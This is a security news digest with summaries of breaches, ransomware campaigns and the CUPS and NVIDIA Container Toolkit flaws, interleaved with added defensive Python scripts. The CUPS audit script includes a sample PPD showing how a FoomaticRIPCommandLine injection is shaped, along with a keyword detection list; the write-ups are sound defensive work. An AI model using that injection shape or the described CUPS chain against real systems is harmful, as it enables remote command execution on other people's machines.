        The Browser Company has introduced an Arc Bug Bounty Program to encourage security researchers to report vulnerabilities to the project and receive rewards. [...] "

        Autosummary: Reward: $500 - $2,500 : Vulnerabilities affecting multiple tabs, limited session/data impact, or partial access to sensitive info (may require user interaction). "


        Rackspace monitoring data stolen in ScienceLogic zero-day attack

        exploits
        2024-10-01 https://www.bleepingcomputer.com/news/security/rackspace-monitoring-data-stolen-in-sciencelogic-zero-day-attack/
        Cloud hosting provider Rackspace suffered a data breach exposing "limited" customer monitoring data after threat actors exploited a zero-day vulnerability in a third-party tool used by the ScienceLogic SL1 platform. [...] "

        Autosummary: In an email sent to customers and seen by The Register, Rackspace warned that the hackers exploited the zero-day to gain access to web servers and steal limited customer monitoring data, including customer account names and numbers, customer usernames, Rackspace internally generated device IDs, device name and information, IP addresses, and AES256 encrypted Rackspace internal device agent credentials. "


        Fake Disney+ activation page redirects to pornographic scam

        financial
        2024-10-01 https://www.malwarebytes.com/blog/scams/2024/10/fake-disney-activation-page-redirects-to-pornographic-scam
        Next time you need to activate a subscription on your TV, watch out for these fake sites scammers are using to trick you and steal your money. "

Autosummary: “Alureon Spyware With Child Pornography Download Detected”: the page contains a background image with pornographic material, as if it were from sites victims may have visited. Despite the scary warning page, this is all a scam and you do not need to call the phone number shown on screen. "


        Cybersecurity Awareness Month needs a radical overhaul – it needs legislation

        ciber
        2024-10-01 https://www.welivesecurity.com/en/cybersecurity/cybersecurity-awareness-month-radical-overhaul-legislation/
        Despite their benefits, awareness campaigns alone are not enough to encourage widespread adoption of cybersecurity best practices "

Autosummary: Beyond tips and tricks: after a decade of promoting the same guidance (Cybersecurity Awareness Month itself marks its 21st anniversary this year), it’s time for the industry to have a radical rethink and, alongside doing the talking, legislate and enforce better cybersecurity practices, especially where personally identifiable information (PII) or other data of value is at stake. Without even looking at the official theme of this year’s edition of the campaign, I rattled off the usual advice to a colleague last week – use strong and unique passwords, enable multi-factor authentication (MFA), and avoid clicking on phishing links – and sure enough, I captured almost all the main points of this year’s official “Secure Our World” theme. "


        SCCMSecrets: Open-source SCCM policies exploitation tool

        exploits
        2024-09-30 https://www.helpnetsecurity.com/2024/09/30/sccmsecrets-open-source-sccm-policies-exploitation-tool/

        SCCMSecrets is an open-source tool that exploits SCCM policies, offering more than just NAA credential extraction. SCCM policies are a key target for attackers in Active Directory environments, as they can expose sensitive technical information, including account credentials. Attackers may retrieve these credentials by impersonating a registered device with authenticated access or, in some cases, even from an unauthenticated position by exploiting misconfigurations in policy distribution. SCCMSecrets provides a thorough approach to identifying and exploiting … More

        The post SCCMSecrets: Open-source SCCM policies exploitation tool appeared first on Help Net Security.

        "

        Autosummary: "


        Ransomware attackers hop from on-premises systems to cloud to compromise Microsoft 365 accounts

        exploits
        2024-09-30 https://www.helpnetsecurity.com/2024/09/30/ransomware-cloud-compromise/

        Storm-0501, an affiliate of several high-profile ransomware-as-a-service outfits, has been spotted compromising targets’ cloud environments and on-premises systems. “Storm-0501 is the latest threat actor observed to exploit weak credentials and over-privileged accounts to move from organizations’ on-premises environment to cloud environments. They stole credentials and used them to gain control of the network, eventually creating persistent backdoor access to the cloud environment and deploying ransomware to the on-premises,” Microsoft shared last week. Common tactics and … More

        The post Ransomware attackers hop from on-premises systems to cloud to compromise Microsoft 365 accounts appeared first on Help Net Security.

        "

Autosummary: They engage in a concerted effort to compromise as many credentials as they can, by using Impacket, gathering KeePass secrets from the compromised devices, and possibly via brute force. They use Cobalt Strike (and compromised credentials) to “move” to additional endpoints and servers, including domain controllers. They interfere with endpoint security solutions, use the Rclone tool to exfiltrate data, and deploy the Embargo ransomware through scheduled tasks and Group Policy Object (GPO) policies. "


THN Cybersecurity Recap: Last Week's Top Threats and Trends (September 23-29)

        ciber
        2024-09-30 https://thehackernews.com/2024/09/thn-cybersecurity-recap-last-weeks-top_30.html
Hold onto your hats, folks, because the cybersecurity world is anything but quiet! Last week, we dodged a bullet when we discovered vulnerabilities in CUPS that could've opened the door to remote attacks. Google's switch to Rust is paying off big time, slashing memory-related vulnerabilities in Android. But it wasn't all good news – Kaspersky's forced exit from the US market left users with more "

Autosummary: A critical firmware supply chain issue known as PKfail (CVE-2024-8105), which allows attackers to bypass Secure Boot and install malware, has now been found to impact more devices, including medical devices, desktops, laptops, gaming consoles, enterprise servers, ATMs, PoS terminals, and even voting machines. 🔒 Tip of the Week: prevent data leaks to AI services by enforcing strict policies against sharing with external AI platforms, deploying DLP tools to block confidential transmissions, restricting access to unauthorized AI tools, training employees on the risks, and using secure, in-house AI solutions. In yet another law enforcement action, the U.S. government charged three Iranian nationals, Masoud Jalili, Seyyed Ali Aghamiri, and Yasar (Yaser) Balaghi, who are allegedly employed by the Islamic Revolutionary Guard Corps (IRGC), for their targeting of current and former officials to steal sensitive data in an attempt to interfere with the upcoming elections. "Incorporating Tails into the Tor Project's structure allows for easier collaboration, better sustainability, reduced overhead, and expanded training and outreach programs to counter a larger number of digital threats," the organizations said. "


        Media giant AFP hit by cyberattack impacting news delivery services

        ciber
        2024-09-30 https://www.bleepingcomputer.com/news/security/media-giant-afp-hit-by-cyberattack-impacting-news-delivery-services/
        Global news agency AFP (Agence France-Presse) is warning that it suffered a cyberattack on Friday, which impacted IT systems and content delivery services for its partners. [...] "

Autosummary: AFP is an award-winning Paris-based news agency with a presence in 150 countries, employing over 2,400 people in 260 cities, and covering news in French, English, Arabic, Portuguese, and Spanish. "


        Community Clinic of Maui discloses a data breach following May Lockbit ransomware attack

        financial exploits ransomware
        2024-09-30 https://securityaffairs.com/169125/data-breach/community-clinic-of-maui-lockbit-ransomware.html
        Community Clinic of Maui experienced a data breach impacting over 120,000 people following a LockBit ransomware attack. In May, the Community Clinic of Maui experienced a major IT outage that impacted thousands of patients following a cyber attack. In June, the Lockbit ransomware gang took credit for the attack. The Community Clinic of Maui, also known as Mālama […] "

        Autosummary: “The personal information that was potentially impacted included first and last names with one or more of the following identifiers: Social Security Number, Date Of Birth, Driver’s License Number / State Id Number, Passport Number, Financial Account Number, Routing Number, Bank Name, Credit / Debit Card Number, Card CVV Expiration Date, Pin/Security Code, Login Information, Medical Diagnosis, Clinical Information, Medical Treatment/Procedure Information, Treatment Type, Treatment Location, Treatment Cost Information, Doctor’s Name, Medical Record Number, Patient Account Number, Prescription Information and/ or Biometric Data. Mālama investigated the security breach with external cybersecurity professionals, and on August 7, 2024, the experts determined that personal data may ‘have been subject to unauthorized access and acquisition between May 4, 2024 and May 7, 2024.’ "


        Mexico counting dead from "zombie storm" John

        latam
        2024-09-30 https://www.bbc.com/news/articles/cden3j9d1r7o
        At least 15 people are dead after Hurricane John hit Mexico twice, triggering landslides and floods. "

        Autosummary: "


        JPCERT shares Windows Event Log tips to detect ransomware attacks

        exploits ransomware
        2024-09-30 https://www.bleepingcomputer.com/news/security/jpcert-shares-windows-event-log-tips-to-detect-ransomware-attacks/
Japan's Computer Emergency Response Team Coordination Center (JPCERT/CC) has shared tips on detecting different ransomware gangs' attacks based on entries in Windows Event Logs, providing timely detection of ongoing attacks before they spread too far into a network. [...] "

Autosummary: [Figure: characteristic Bisamware ransomware logs. Source: JPCERT/CC] JPCERT/CC also notes that seemingly unrelated ransomware variants such as Shade, GandCrab, AKO, AvosLocker, BLACKBASTA, and Vice Society leave behind very similar traces (event IDs: 13, 10016). "
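The two JPCERT/CC items above (the Help Net Security write-up and this one) describe the idea but not the query. The following is an added example, not JPCERT/CC's code or tooling: it runs the event-ID approach over a handful of constructed Windows event records (shaped like the fields Get-WinEvent returns, but not real logs). The ID table holds only the two IDs the article quotes (13 and 10016, shared by Shade, GandCrab, AKO, AvosLocker, BLACKBASTA and Vice Society); the full report pairs each ID with a log and provider name, so matching on ID alone as here is noisy and the table is meant to be filled in from the report. The per-host ten-minute window that requires two distinct indicative IDs before alerting is an assumption of this example.

```python
"""Detection sketch for JPCERT/CC's event-log approach (added example; not
JPCERT/CC's code). Records are constructed dicts, not real logs. The ID table
holds only the two IDs the article quotes; extend it from the full report,
which also pairs each ID with a log name and provider (matching on ID alone
is noisy). The correlation window is an assumption."""
from __future__ import annotations
from datetime import datetime, timedelta

SHARED = ("Shade", "GandCrab", "AKO", "AvosLocker", "BLACKBASTA", "Vice Society")

# EventID -> ransomware families JPCERT/CC associates with it (from the article).
INDICATIVE_EVENT_IDS: dict[int, tuple[str, ...]] = {13: SHARED, 10016: SHARED}

# Constructed sample records (not real logs): one benign logon, then two
# indicative IDs a second apart on FS01, and a lone 10016 hours later on WS22.
SAMPLE_EVENTS = [
    {"TimeCreated": "2024-09-27T03:12:04", "Id": 4624, "LogName": "Security", "MachineName": "FS01"},
    {"TimeCreated": "2024-09-27T03:15:40", "Id": 13, "LogName": "System", "MachineName": "FS01"},
    {"TimeCreated": "2024-09-27T03:15:41", "Id": 10016, "LogName": "System", "MachineName": "FS01"},
    {"TimeCreated": "2024-09-27T09:00:00", "Id": 10016, "LogName": "System", "MachineName": "WS22"},
]


def flag_events(events: list[dict]) -> list[dict]:
    """Return the events whose ID is in the indicative table, each annotated
    with the families JPCERT/CC ties to that ID."""
    hits = []
    for ev in events:
        families = INDICATIVE_EVENT_IDS.get(int(ev["Id"]))
        if families:
            hits.append({**ev, "Families": families})
    return hits


def correlate(events: list[dict], window: timedelta = timedelta(minutes=10)) -> dict[str, list[int]]:
    """Per host, alert only when at least two distinct indicative IDs occur
    within `window` of an earlier one. Returns {host: sorted IDs in cluster}.
    A single 10016 on its own (common DCOM noise) therefore does not alert."""
    by_host: dict[str, list[dict]] = {}
    for ev in sorted(flag_events(events), key=lambda e: e["TimeCreated"]):
        by_host.setdefault(ev["MachineName"], []).append(ev)

    alerts: dict[str, list[int]] = {}
    for host, evs in by_host.items():
        for i, first in enumerate(evs):
            t0 = datetime.fromisoformat(first["TimeCreated"])
            ids = {int(first["Id"])}
            for later in evs[i + 1:]:
                if datetime.fromisoformat(later["TimeCreated"]) - t0 <= window:
                    ids.add(int(later["Id"]))
            if len(ids) >= 2:
                alerts[host] = sorted(ids)
                break
    return alerts


if __name__ == "__main__":
    for host, ids in correlate(SAMPLE_EVENTS).items():
        print(f"{host}: indicative event IDs {ids} within window")
```

On a real host the `SAMPLE_EVENTS` list would be replaced by records exported from the Application, Security, System and Setup logs; the correlation step is what keeps the single noisy ID from paging anyone.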


        T-Mobile pays $31.5 million FCC settlement over 4 data breaches

        financial
        2024-09-30 https://www.bleepingcomputer.com/news/security/t-mobile-pays-315-million-fcc-settlement-over-4-data-breaches/
        The Federal Communications Commission (FCC) announced a $31.5 million settlement with T-Mobile over multiple data breaches that compromised the personal information of millions of U.S. consumers. [...] "

        Autosummary: "


        Patelco Credit Union data breach impacted over 1 million people

        financial Telcos
        2024-09-30 https://securityaffairs.com/169139/cyber-crime/patelco-credit-union-data-breach.html
        The ransomware attack on Patelco Credit Union this summer led to a data breach affecting over 1 million individuals, revealed the company. Patelco Credit Union is a member-owned, not-for-profit credit union that serves Northern California, particularly the San Francisco Bay Area. Founded in 1936, it is one of the oldest and largest credit unions in the […] "

Autosummary: The ransomware attack on Patelco Credit Union this summer led to a data breach affecting over 1 million individuals, the company revealed. "


        SECURITY AFFAIRS MALWARE NEWSLETTER – ROUND 13

        exploits
        2024-09-29 https://securityaffairs.com/169073/breaking-news/security-affairs-malware-newsletter-round-13.html
Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape. How the Necro Trojan infiltrated Google Play, again; Kryptina RaaS | From Unsellable Cast-Off to Enterprise Ransomware […] "

        Autosummary: "


        A cyberattack on Kuwait Health Ministry impacted hospitals in the country

        government ciber
        2024-09-28 https://securityaffairs.com/169031/security/cyberattack-on-kuwait-health-ministry-impacted-hospitals.html
        The Kuwait Health Ministry is recovering from a cyberattack that disrupted systems at multiple hospitals and disabled the Sahel healthcare app. Kuwait’s Health Ministry was the victim of a cyberattack that took systems at several of the country’s hospitals offline. The cyber attack also impacted the Ministry of Health website, which is still offline, and […] "

        Autosummary: "


        Crypto Scam App Disguised as WalletConnect Steals $70K in Five-Month Campaign

        financial
        2024-09-28 https://thehackernews.com/2024/09/crypto-scam-app-disguised-as.html
        Cybersecurity researchers have discovered a malicious Android app on the Google Play Store that enabled the threat actors behind it to steal approximately $70,000 in cryptocurrency from victims over a period of nearly five months. The dodgy app, identified by Check Point, masqueraded as the legitimate WalletConnect open-source protocol to trick unsuspecting users into downloading it. "Fake "

        Autosummary: The campaign involved distributing a deceptive app that went by several names such as "Mestox Calculator," "WalletConnect - DeFi & NFTs," and "WalletConnect - Airdrop Wallet" (co.median.android.rxqnqb). "


        They were arrested for posting during the riots – will it change anything?

        industry
        2024-09-27 https://www.bbc.com/news/articles/cr548zdmz3jo
        Charges following disorder felt significant, but for social media giants there was no day of reckoning. "

Autosummary: And nor, it seems, for the social media giants whose algorithms, time and time again, are accused of prioritising engagement over safety, pushing content regardless of the reaction it can provoke. Kay, 26, and Parlour, 28, have been sentenced to 38 months and 20 months in prison respectively for stirring up racial hatred online during the summer riots. But while accountability has been felt at “the very sharp end” by those who participated in the disorder and posted hateful content online, Mr Jukes said “the people who make billions from providing those opportunities” to post harmful content on social media “have not really paid any price at all”. The UK’s head of counter-terror policing, Assistant Commissioner Matt Jukes, told me for the BBC’s Newscast that “X was an enormous driver” of posts that contributed to the summer’s disorder. "


        3 tips for securing IoT devices in a connected world

        industry
        2024-09-27 https://www.helpnetsecurity.com/2024/09/27/iot-devices-security/

        IoT devices have become integral to how many organizations operate. From Smart TVs in conference rooms to connected sensors and wireless security cameras, these connected devices are now a fixture in the modern workplace. They also, however, present a real and often overlooked cybersecurity threat. An effective, comprehensive approach to IoT security requires organizations to have complete visibility into all connected devices within their network, addressing common vulnerabilities such as built-in backdoors and outdated firmware, … More

        The post 3 tips for securing IoT devices in a connected world appeared first on Help Net Security.

        "

Autosummary: When segmenting your network, organizations should:
- Isolate IoT devices
- Use VLANs and firewalls with security controls between network segments
- Employ zero-trust architecture
Access control is the process of defining and enforcing policies that dictate who or what can access specific resources within a network. An effective, comprehensive approach to IoT security requires organizations to have complete visibility into all connected devices within their network, addressing common vulnerabilities such as built-in backdoors and outdated firmware, alongside ensuring secure deployment practices. "


        Developing an effective cyberwarfare response plan

        ciber
        2024-09-27 https://www.helpnetsecurity.com/2024/09/27/nadir-izrael-armis-ai-cyberwarfare/

        In this Help Net Security interview, Nadir Izrael, CTO at Armis, discusses how AI has transformed cyberwarfare by amplifying attacks’ scale and sophistication. Izrael emphasizes the need for AI-powered defenses and proactive cybersecurity strategies to combat these evolving threats. How has adopting AI transformed the nature of cyberwarfare, and what specific capabilities does it offer to threat actors? AI has transformed the nature of cyberwarfare. Threat actors can amplify the scale and sophistication of attacks … More

        The post Developing an effective cyberwarfare response plan appeared first on Help Net Security.

        "

Autosummary: Armis Labs has identified several threat actors actively using AI to advance their cyber capabilities, including Russian-affiliated Forest Blizzard (APT28), North Korean hackers Emerald Sleet (Kimsuky), Iranian threat actors Crimson Sandstorm (Imperial Kitten), and Chinese state-affiliated groups Charcoal Typhoon (Aquatic Panda) and Salmon Typhoon (Maverick Panda). To do this, organizations need a comprehensive strategy that proactively identifies and mitigates cyber asset risks, remediates security findings and vulnerabilities, and protects the entire attack surface. In this Help Net Security interview, Nadir Izrael, CTO at Armis, discusses how AI has transformed cyberwarfare by amplifying attacks’ scale and sophistication. "


        Critical NVIDIA Container Toolkit Vulnerability Could Grant Full Host Access to Attackers

        exploits
        2024-09-27 https://thehackernews.com/2024/09/critical-nvidia-container-toolkit.html
        A critical security flaw has been disclosed in the NVIDIA Container Toolkit that, if successfully exploited, could allow threat actors to break out of the confines of a container and gain full access to the underlying host. The vulnerability, tracked as CVE-2024-0132, carries a CVSS score of 9.0 out of a maximum of 10.0. It has been addressed in NVIDIA Container Toolkit version v1.16.2 and "

        Autosummary: "With this access, the attacker can now reach the Container Runtime Unix sockets (docker.sock/containerd.sock)," security researchers Shir Tamari, Ronen Shustin, and Andres Riancho said. "
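An operator reading the item above wants two answers: is the installed toolkit older than the fixed v1.16.2, and which containers on the host were started through the nvidia runtime and so passed through the affected code path. The following is an added example, not NVIDIA's, the toolkit's or the researchers' code. The version banner and the docker-inspect style JSON are constructed samples; the assumed real-world inputs are the output of `nvidia-ctk --version` and `docker inspect`, and a container that receives GPUs without `HostConfig.Runtime` being set to `nvidia` would be missed by the second check (a stated limitation, not something the article covers).

```python
"""Exposure check for CVE-2024-0132 in the NVIDIA Container Toolkit (added
example; not NVIDIA's or the researchers' code). Inputs are constructed
samples; in practice feed `nvidia-ctk --version` and `docker inspect` output
(assumed sources). The fixed version comes from the article."""
from __future__ import annotations
import json
import re

FIXED_VERSION = (1, 16, 2)  # first fixed toolkit release named in the article


def parse_version(banner: str) -> tuple[int, int, int]:
    """Pull the first x.y.z out of a version banner such as
    'NVIDIA Container Toolkit CLI version 1.16.1' (constructed sample format)."""
    m = re.search(r"\b(\d+)\.(\d+)\.(\d+)\b", banner)
    if m is None:
        raise ValueError(f"no version in {banner!r}")
    major, minor, patch = (int(x) for x in m.groups())
    return (major, minor, patch)


def toolkit_vulnerable(banner: str) -> bool:
    """True when the toolkit predates the fix. Tuple comparison, not string
    comparison, so that 1.9.x sorts below 1.16.2."""
    return parse_version(banner) < FIXED_VERSION


def nvidia_runtime_containers(inspect_json: str) -> list[str]:
    """Names of containers whose HostConfig.Runtime is 'nvidia'. Containers
    that got GPUs through other means are not detected (assumption/limitation)."""
    names = []
    for c in json.loads(inspect_json):
        if c.get("HostConfig", {}).get("Runtime") == "nvidia":
            names.append(c.get("Name", "").lstrip("/"))
    return names


def exposed_containers(banner: str, inspect_json: str) -> list[str]:
    """Containers that matter for this flaw: only those launched through the
    nvidia runtime, and only while the toolkit is unpatched."""
    if not toolkit_vulnerable(banner):
        return []
    return nvidia_runtime_containers(inspect_json)


# Constructed samples (not real command output).
SAMPLE_BANNER_OLD = "NVIDIA Container Toolkit CLI version 1.16.1\ncommit: 0000000"
SAMPLE_BANNER_FIXED = "NVIDIA Container Toolkit CLI version 1.16.2\ncommit: 0000000"
SAMPLE_INSPECT = json.dumps([
    {"Name": "/ml-train", "HostConfig": {"Runtime": "nvidia"}},
    {"Name": "/web", "HostConfig": {"Runtime": "runc"}},
    {"Name": "/untrusted-notebook", "HostConfig": {"Runtime": "nvidia"}},
])

if __name__ == "__main__":
    print("exposed:", exposed_containers(SAMPLE_BANNER_OLD, SAMPLE_INSPECT))
```

The point of gating on the runtime is triage: on an unpatched host, a container that runs an attacker-supplied image under the nvidia runtime is the one that can reach the host and its docker.sock/containerd.sock, so those are the workloads to stop or isolate until the upgrade lands.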


        CUPS vulnerabilities affecting Linux, Unix systems can lead to RCE

        Linux
        2024-09-27 https://www.helpnetsecurity.com/2024/09/27/cups-vulnerabilities/

After much hyping and following prematurely leaked information by a third party, security researcher Simone Margaritelli has released details about four zero-day vulnerabilities in the Common UNIX Printing System (CUPS) that can be abused by remote, unauthenticated attackers to achieve code execution on vulnerable Linux and Unix-like systems. The CUPS vulnerabilities CUPS is an open-source printing system that allows a computer on which it is installed to act as a print server. It is developed by … More

        The post CUPS vulnerabilities affecting Linux, Unix systems can lead to RCE appeared first on Help Net Security.

        "

Autosummary: The vulnerabilities discovered by Margaritelli (aka EvilSocket) affect several CUPS components/packages:
- CVE-2024-47176, in the cups-browsed (up to version 2.0.1) helper daemon, which allows attackers to submit packets via the IPP default port (UDP 631) and trick it into requesting arbitrary, attacker-controlled URLs
- CVE-2024-47076, in libcupsfilters (up to version 2.1b1), which allows attackers to pass malicious data to other CUPS components
- CVE-2024-47175, in libppd (up to version 2.1b1), which allows attackers to inject malicious data into the temporary PPD file passed to CUPS components
- CVE-2024-47177, in cups-filters (up to version 2.0.1), which allows attackers to execute arbitrary commands via the FoomaticRIPCommandLine PPD parameter
By chaining some of these flaws, “a remote unauthenticated attacker can silently replace existing printers’ (or install new ones) IPP URLs with a malicious one, resulting in arbitrary command execution (on the computer) when a print job is started (from that computer),” Margaritelli explained. "
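The chain above has two places a defender can check without touching the network: whether cups-browsed is still willing to accept announcements over the legacy CUPS browse protocol on UDP/631 (the entry point for CVE-2024-47176), and whether any PPD on the box carries a FoomaticRIPCommandLine value (the keyword abused for CVE-2024-47177). The following is an added example, not Margaritelli's or the CUPS project's code. It audits constructed text standing in for /etc/cups/cups-browsed.conf and a PPD file; the BrowseRemoteProtocols directive and its upstream default of "dnssd cups" are real cups-browsed settings, the placeholder command in the sample PPD is harmless, and the two extra Foomatic keywords it watches beyond the one named in the article are an assumption of this example.

```python
"""Audit helpers for the CUPS chain above (added example; not from the
advisory or the CUPS project). Inputs are constructed strings standing in
for /etc/cups/cups-browsed.conf and a PPD file. BrowseRemoteProtocols is the
real cups-browsed directive (default "dnssd cups"); FoomaticRIPCommandLine is
the PPD keyword named in the article. The two further Foomatic keywords
watched below are an assumption."""
from __future__ import annotations
import re

# Constructed sample: the upstream default, which listens for both protocols.
SAMPLE_CONF_DEFAULT = """
# cups-browsed.conf (constructed sample)
BrowseRemoteProtocols dnssd cups
"""

# Constructed hardened sample: remote browsing switched off entirely.
SAMPLE_CONF_HARDENED = """
BrowseRemoteProtocols none
"""

# Constructed PPD fragment of the shape a malicious IPP server could hand to
# libppd. The command is a harmless placeholder, not a real payload.
SAMPLE_PPD = """*PPD-Adobe: "4.3"
*ModelName: "Example Printer"
*FoomaticRIPCommandLine: "echo HARMLESS-PLACEHOLDER; gs -q -dNOPAUSE"
*cupsFilter2: "application/pdf application/vnd.cups-postscript 0 pdftops"
"""

# Keywords the foomatic-rip filter turns into shell commands (assumption for
# the last two; only FoomaticRIPCommandLine is named in the article).
WATCHED_PPD_KEYWORDS = {"FoomaticRIPCommandLine", "FoomaticRIPCommandLinePDF", "FoomaticRIPPostPipe"}


def remote_browse_protocols(conf_text: str) -> set[str]:
    """Protocols cups-browsed would listen for, given the config text.
    Comments are ignored and the last directive wins; "none" clears the set."""
    protocols = {"dnssd", "cups"}  # upstream default when the directive is absent
    for line in conf_text.splitlines():
        line = line.split("#", 1)[0].strip()
        m = re.match(r"BrowseRemoteProtocols\s+(.*)$", line, re.IGNORECASE)
        if m:
            protocols = {p.lower() for p in m.group(1).split()}
            protocols.discard("none")
    return protocols


def cups_browse_exposed(conf_text: str) -> bool:
    """True if the legacy CUPS browse protocol is enabled, i.e. the daemon
    accepts unsolicited printer announcements on UDP/631."""
    return "cups" in remote_browse_protocols(conf_text)


def risky_ppd_keywords(ppd_text: str) -> list[tuple[str, str]]:
    """(keyword, value) pairs for PPD keywords that lead to command execution
    in the filter chain; a clean vendor PPD normally has none of them."""
    found = []
    for line in ppd_text.splitlines():
        m = re.match(r'\*(\w+):\s*"(.*)"\s*$', line)
        if m and m.group(1) in WATCHED_PPD_KEYWORDS:
            found.append((m.group(1), m.group(2)))
    return found


if __name__ == "__main__":
    print("browse exposed (default conf):", cups_browse_exposed(SAMPLE_CONF_DEFAULT))
    print("browse exposed (hardened conf):", cups_browse_exposed(SAMPLE_CONF_HARDENED))
    print("risky PPD keywords:", risky_ppd_keywords(SAMPLE_PPD))
```

Point the two functions at the real config and at the files under /etc/cups/ppd/ to get the same answers for a host; a "cups" entry in the first result or any tuple in the second is the thing to fix before relying on patched packages alone.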


        Microsoft Identifies Storm-0501 as Major Threat in Hybrid Cloud Ransomware Attacks

        exploits ransomware
        2024-09-27 https://thehackernews.com/2024/09/microsoft-identifies-storm-0501-as.html
        The threat actor known as Storm-0501 has targeted government, manufacturing, transportation, and law enforcement sectors in the U.S. to stage ransomware attacks. The multi-stage attack campaign is designed to compromise hybrid cloud environments and perform lateral movement from on-premises to cloud environment, ultimately resulting in data exfiltration, credential theft, tampering, persistent "

        Autosummary: Active since 2021, the threat actor has a history of targeting education entities with Sabbath (54bb47h) ransomware before evolving into a ransomware-as-a-service (RaaS) affiliate delivering various ransomware payloads over the years, including Hive, BlackCat (ALPHV), Hunters International, LockBit, and Embargo ransomware. "


        Cybersecurity Certifications: The Gateway to Career Advancement

        ciber
        2024-09-27 https://thehackernews.com/2024/09/cybersecurity-certifications-gateway-to.html
        In today's fast-evolving digital landscape, cybersecurity has become a cornerstone of organizational resilience. As cyber threats grow increasingly sophisticated, the demand for skilled cybersecurity professionals has never been higher. Whether you're a seasoned cyber professional or just starting your journey, signing up for the GIAC Newsletter ensures you're always informed and equipped for "

        Autosummary: For employers, certified professionals bring enhanced work quality, productivity, and innovation to the table, making certifications a win-win for everyone involved. Furthermore, certified professionals tend to have greater work autonomy, with 74% experiencing more independence, which fosters a culture of innovation within organizations. "


        New HTML Smuggling Campaign Delivers DCRat Malware to Russian-Speaking Users

        exploits rusia-ucrania
        2024-09-27 https://thehackernews.com/2024/09/new-html-smuggling-campaign-delivers.html
        Russian-speaking users have been targeted as part of a new campaign distributing a commodity trojan called DCRat (aka DarkCrystal RAT) by means of a technique known as HTML smuggling. The development marks the first time the malware has been deployed using this method, a departure from previously observed delivery vectors such as compromised or fake websites, or phishing emails bearing PDF "

        Autosummary: "The scripts' structure, comments and choice of function names and variables were strong clues that the threat actor used GenAI to create the malware," HP Wolf Security said. "


        U.S. Sanctions Two Crypto Exchanges for Facilitating Cybercrime and Money Laundering

        financial
        2024-09-27 https://thehackernews.com/2024/09/us-sanctions-two-crypto-exchanges-for.html
        The U.S. government on Thursday sanctioned two cryptocurrency exchanges and unsealed an indictment against a Russian national for his alleged involvement in the operation of several money laundering services that were offered to cybercriminals. The virtual currency exchanges, Cryptex and PM2BTC, have been alleged to facilitate the laundering of cryptocurrencies possibly obtained through "

        Autosummary: Elliptic, another blockchain intelligence firm, said it's aware of "thousands of additional addresses" connected to Cryptex, PM2BTC, PinPays, and Joker's Stash, outside of the four cryptoasset addresses listed by the Treasury as tied to Cryptex. "


        Embargo ransomware escalates attacks to cloud environments

        exploits ransomware
        2024-09-27 https://www.bleepingcomputer.com/news/security/embargo-ransomware-escalates-attacks-to-cloud-environments/
        Microsoft warns that ransomware threat actor Storm-0501 has recently switched tactics and now targets hybrid cloud environments, expanding its strategy to compromise all victim assets. [...] "

        Autosummary: "Once the threat actor achieved sufficient control over the network, successfully extracted sensitive files, and managed to move laterally to the cloud environment, the threat actor then deployed the Embargo ransomware across the organization," Microsoft said. "We observed that the threat actor did not always resort to ransomware distribution, and in some cases only maintained backdoor access to the network," the company added. "


        Progress urges admins to patch critical WhatsUp Gold bugs ASAP

        exploits
        2024-09-27 https://www.bleepingcomputer.com/news/security/progress-urges-admins-to-patch-critical-whatsup-gold-bugs-asap/
        Progress Software warned customers to patch multiple critical and high-severity vulnerabilities in its WhatsUp Gold network monitoring tool as soon as possible. [...] "

        Autosummary: The only information available is that the six vulnerabilities were reported by Summoning Team's Sina Kheirkhah, Trend Micro's Andy Niu, and Tenable researchers and were assigned the following CVE IDs and CVSS base scores:
        - CVE-2024-46905: CVSS 8.8/10 (reported by Sina Kheirkhah)
        - CVE-2024-46906: CVSS 8.8/10 (reported by Sina Kheirkhah)
        - CVE-2024-46907: "


        Critical Linux CUPS Printing System Flaws Could Allow Remote Command Execution

        Linux
        2024-09-27 https://thehackernews.com/2024/09/critical-linux-cups-printing-system.html
        A new set of security vulnerabilities has been disclosed in the OpenPrinting Common Unix Printing System (CUPS) on Linux systems that could permit remote command execution under certain conditions. "A remote unauthenticated attacker can silently replace existing printers' (or install new ones) IPP URLs with a malicious one, resulting in arbitrary command execution (on the computer) when a print "

        Autosummary: The list of vulnerabilities is as follows:
        - CVE-2024-47176 - cups-browsed <= 2.0.1 binds on UDP INADDR_ANY:631, trusting any packet from any source to trigger a Get-Printer-Attributes IPP request to an attacker-controlled URL
        - CVE-2024-47076 - libcupsfilters <= 2.1b1 "


        CUPS flaws allow remote code execution on Linux systems under certain conditions

        Linux
        2024-09-27 https://securityaffairs.com/169001/hacking/cups-flaws-allow-rce-on-linux-systems.html
        A researcher has disclosed details of an unpatched Linux vulnerability, initially labeled as critical, that allows remote code execution. The popular cybersecurity researcher Simone Margaritelli (@evilsocket) disclosed technical details of an unpatched vulnerability impacting Linux systems. On September 23, Margaritelli announced plans to disclose an unauthenticated remote code execution (RCE) vulnerability affecting all GNU/Linux systems […] "

        Autosummary: Information about the Linux vulnerability was leaked on GitHub; for this reason, the Italian researcher decided to release the technical details and published a proof-of-concept (PoC) exploit on September 26, 2024. To stop a running cups-browsed service, an administrator should use the following command:
        $ sudo systemctl stop cups-browsed
        The cups-browsed service can also be prevented from starting on reboot with:
        $ sudo systemctl disable cups-browsed
        Blocking all traffic to UDP port 631 and DNS-SD traffic can also mitigate attacks. The researcher disclosed four vulnerabilities, tracked as CVE-2024-47076, CVE-2024-47175, CVE-2024-47176 and CVE-2024-47177, impacting the CUPS (Common UNIX Printing System) open-source printing system. "


        Argentina records sharp rise in poverty

        latam
        2024-09-27 https://www.bbc.com/news/articles/ceqn751x19no
        More than half of people in Argentina are now living in poverty, latest figures indicate. "

        Autosummary: "The government inherited a disastrous situation, the worst inheritance that a government has received in a democracy, perhaps one of the worst that a government has received in history," he added. "


        U.S. charges Joker's Stash and Rescator money launderers

        financial
        2024-09-27 https://www.bleepingcomputer.com/news/legal/us-charges-jokers-stash-and-rescator-money-launderers/
        The U.S. Department of Justice (DoJ) has announced charges against two Russian nationals for operating billion-dollar money laundering services for cybercriminals, including ransomware groups. [...] "

        Autosummary: Notable platforms taken down as a result of the operation, codenamed "Final Exchange," include Xchange.cash, 60cek.org, Bankcomat.com, and Banksman.com, which collectively had over 1.2 million accounts and processed over 3.5 million transactions. "


        Families of 43 missing students in Mexico are still demanding justice

        latam
        2024-09-27 https://www.bbc.com/news/articles/c93py3qzpnyo
        In September 2014, 43 student teachers disappeared from the city of Iguala. Their protesting relatives want to know the truth. "

